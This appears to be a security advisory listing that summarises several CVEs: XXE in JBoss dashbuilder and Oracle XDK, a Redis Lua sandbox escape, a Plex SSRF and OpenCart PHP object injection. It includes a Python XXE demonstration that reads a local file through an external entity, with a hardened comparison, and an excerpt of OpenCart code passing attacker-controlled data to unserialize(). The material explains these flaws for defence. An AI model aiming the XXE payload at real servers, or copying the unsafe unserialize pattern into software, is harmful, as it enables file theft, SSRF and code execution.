CVE-2015-1818
XML external entity (XXE) vulnerability in the dashbuilder import facility (DocumentBuilders) in org.jboss.dashboard.export.ImportManagerImpl in Red Hat JBoss BPM Suite before 6.1.2 allows remote attackers to read arbitrary files, conduct server-side request forgery (SSRF) attacks, and have other...
redis -- EVAL Lua Sandbox Escape
Ben Murphy reports: It is possible to break out of the Lua sandbox in Redis and execute arbitrary code. This shouldn’t pose a threat to users under the trusted Redis security model where only trusted users can connect to the database. However, in real deployments there could be databases that can...
XXE
Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors. NOTE: the previous information is from the January 2015 CPU. Oracle has not...
CVE-2014-6577
CVE-2014-6577 is an Oracle Database Server issue affecting the XML Developer's Kit for C component. Versions 11.2.0.3/11.2.0.4/12.1.0.1/12.1.0.2 are affected. The vulnerability is described as an XML external entity (XXE) issue in the XML parser that could allow a remote, authenticated user to af...
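The JBoss dashbuilder entry (CVE-2015-1818) and the two Oracle XDK entries (CVE-2014-6577) share one mechanism: a parser that honours `<!ENTITY ... SYSTEM "...">` declarations lets the document author make the server read a local file (or fetch a URL, which is the SSRF case) and return the result as element text. The following is an added illustration, not code from Red Hat, Oracle, or this listing; it uses Python's standard-library SAX parser in place of the Java DocumentBuilders and the XDK for C, and the secret file, its contents and the attacker document are constructed here.

```python
"""XXE file read, shown with Python's stdlib SAX parser (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, i.e. whatever the entity reference expands to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def xxe_document(target_path):
    """Constructed attacker document: an external general entity whose system
    identifier is a local path, referenced from element content."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [<!ENTITY xxe SYSTEM "%s">]>\n'
        '<data>&xxe;</data>\n' % target_path
    ).encode()


def parse(xml_bytes, resolve_external_entities):
    """Parse the document and return the text the parser produced.

    resolve_external_entities=True is the vulnerable configuration (the parser
    follows SYSTEM identifiers); False is the hardened one, and has been
    Python's default since 3.7.1. Java DocumentBuilderFactory needs the
    equivalent feature switches (disallow-doctype-decl, or external-general-
    entities / external-parameter-entities set to false).
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Return (text from vulnerable parser, text from hardened parser) for a
    constructed secret file; the first leaks the file, the second is empty."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")  # constructed sample secret
        secret_path = f.name
    try:
        doc = xxe_document(secret_path)
        leaked = parse(doc, resolve_external_entities=True)
        hardened = parse(doc, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

Replacing the SYSTEM identifier with an http:// URL makes the vulnerable configuration issue a request from the server, which is the SSRF impact named in the JBoss entry; the example keeps to a local file so it runs offline. Note that the hardened parser returns empty text rather than an error, so an application that also wants to reject such documents outright should refuse any DOCTYPE.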
CVE-2014-9304
Plex Media Server before 0.9.9.3 allows remote attackers to bypass the web server whitelist, conduct SSRF attacks, and execute arbitrary administrative actions via multiple crafted X-Plex-Url headers to system/proxy, which are inconsistently processed by the request handler in the backend web...
OpenCart 1.5.6.4 PHP Object Injection Vulnerability
Exploit for the PHP platform, category: web applications. Affected OpenCart code (cart handling; the cart key is built from data the shopper submits when adding a product and is stored in the session):

    // Each cart key has the form "<product_id>:<base64(serialized options)>"
    foreach ($this->session->data['cart'] as $key => $quantity) {
        $product = explode(':', $key);
        $product_id = $product[0];
        $stock = true;

        // Options
        if (!empty($product[1])) {
            // Attacker-controlled serialized data reaches unserialize(): PHP object injection
            $options = unserialize(base64_decode($product[1]));
        } else {
            $options = array();
        }
        // ... remainder of the loop body not shown on this page
    }

The vulnerability exists...